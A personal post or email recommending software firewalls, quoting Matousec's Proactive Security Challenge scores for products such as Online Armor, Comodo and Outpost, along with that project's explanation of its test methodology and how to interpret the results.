|
Firewall ratings.You've received emails from me describing the results of some of the dependable tests for AntiVirus software. And I sent one once regarding the quality of various firewalls on preventing leaks (allowing information to leave your computer secretly, without your knowledge).I have been unable to find a trustworthy review comparing the effectiveness of firewalls generally, until now. Some will only be interested in the table of results, and they are listed below. Anyone interested in looking at the methodology for a more in depth understanding of the results can start here ( http://www.matousec.com/projects/proactive-security-challenge/ ). Matausec has developed a suite of 84 tests of a firewall (including how easy is it for software to disable the software). It's interesting to note that 3 of the 5 Firewalls achieving a rating of Excellent (and 5 of the 11 recommended packages) are free products. You should definitely look at the software firewall you are using, to see how well it performs. Over 20 firewalls have an effectiveness rating of "nonexistent". I am using a current version of Comodo on two computers, and have recently changed from an old ZoneAlarm to Outpost Firewall on another computer. It has a much simpler interface than Comodo, but doesn't test quite as well. I haven't used it long enough to see if I'm short on features, but I don't expect to be. A firewall that you can install and forget about is potentially a good thing. |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Products' ratingsNote that this table can be found here ( http://www.matousec.com/projects/proactive-security-challenge/results.php ) along with the venors responses to the test results. The table(s) below sort(s) the tested products by their total
score, which is displayed in the Product score column.
There are two possible views of the total scores. The default view
separates the results by the number of tests
that were in the system when the products were tested, i.e. the number
of tests with a valid test result value (other value
than N/A). There is one table for each number of tests. The
second view mixes all the results in one table.
In the second view, the Product score
column consists of two numbers separated by a slash –
the actual score and the number of tests that were in the system when
the given product was tested. You can switch between the views
using the link below. This table also shows the exact version of every
tested product. The Level reached column presents the highest
level that the product reached in Proactive Security Challenge.
If it passed all levels, this number is suffixed with a plus sign.
For products that score at least 80% in Proactive Security Challenge,
the Recommendation column contains links to the online stores
or products' webpages of the vendors that we have affiliate agreements
with. If you click on any of these links and then buy
the target product or other product offered on the target webpage, we
will profit from it. This is one of the ways how you can
support this project. The PDF document icon allows you to download the
testing report in PDF format for the tested product. Results
Detailed resultsThe following links take you to pages with detailed products' results on each level. The level pages also contain important information about the given level and short information about its tests.
Interpretation of resultsThe paid version of Online Armor Personal Firewall 3.5.0.14 leads the challenge with 99%, followed by two free products – Comodo Internet Security 3.8.65951.477 with 96% and Outpost Firewall Free 2009 6.5.2724.381.0687.328 with 93%. Outpost Security Suite Pro 2009 6.5.4.2525.381.0687 is fourth with the score of 92%, followed by Online Armor Personal Firewall 3.5.0.14 Free also with 92%. These products reached the Excellent level of protection. It may look strange that the free version of Outpost Firewall finished with the better score than the paid Outpost Security Suite. The reason is that almost all features that our project tests are implemented in the same way in both products. However, Outpost Security Suite includes antivirus and antispyware engines implemented by additional driver that are not included in Outpost Firewall Free. And because of these additional drivers Outpost Security Suite did not pass level 9 tests, which caused the final lower score. It seems that Proactive Security Challenge tests make a big difference between really good products and the rest of the world. Most of the products are filtered in very low levels which means that they probably miss some critical features. However, it is crucial to know what does it mean if a product succeeds in our tests and what does it mean if it fails. Before you start interpreting the results, you should be familiar with the information on the index page, especially with the methodology and rules. You should also know what kind of products do we test before you start to interpret the results. We have received a lot of reactions from people who are not familiar with that information and simply do not understand the results and misinterpret them. All the tested products have one common feature – the application-based security model. In combination with their packet filtering capabilities, the tested products attempt to block attacks from other machines on the network as well as attacks performed by malicious codes that might run inside the protected machine. This is definitely not an unusual situation. People who use email clients, instant messengers, or web browsers face attacks that exploit the vulnerabilities in this kind of software very often. It happens that a malicious code gets inside the machine. And then it may try to install itself silently to the system, to steal users' data or sniff their passwords, or to join the target machine to the botnet. This is what the products we test want to prevent. This is why they are used. The problem is that although the goal is common, not all the products implement a sufficient protection. We require the products tested in Proactive Security Challenge to prevent data and identity theft. They should also implement a packet filter functionality to prevent direct online attacks – i.e. not to let the malware get in. The products should control the software installed on the computer to prevent the malware to integrate itself into the operating system. Then the malware should not be able to get the user's private data, thus anti-sniffing, anti-keylogging and personal data protection features should be implemented too. And even if the malware succeeded to collect the information it should not be allowed to send it outside the protected system and this means an implementation of the outbound network traffic control. To achieve all these is much harder task than it seems. The protection system also has to prevent attacking trusted processes and other components in the system. Otherwise, the malware would be able to use trusted parts of the system to integrate into the operating system, to collect or steal sensitive data and/or to send the data outside the system without being noticed. So the next feature that is required here is a control of untrusted processes' activities and that is the hardest task for the tested products. It also includes an implementation of self-protection mechanisms because the malware should not be able to terminate the protection, which implies some other features to be implemented and so on. So, what does it mean if the product fails even the most basic tests of our challenge? It means that it is unable to do what its vendor claims it can. Such a product can hardly protect you against the mentioned threats. On the other hand, if the product succeeds in all our tests, it does not mean that it is perfect. Our tests are focused on the security and stability, but there are many other aspects important for the users like performance, hardware requirements, easy to use, availability of support, price, vendor's reaction time to new threats etc. It should be also noted that although our testing suite is quite large, it is not complete and there are many other ways to bypass the tested products. Moreover, the products are tested on systems with almost no third party software, which limits the stability tests we perform. We are working constantly on extending the suite to be able to provide more accurate information about the security and stability of the tested products. If the tested product fails only a few tests in our challenge, it still might be a great product. This is why we can recommend, from the security point of view, the products that reached at least 80% score in the challenge. You should try them yourself and choose the one best for you, the one that you would be happy with, the one you would be able to configure and use everyday. |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||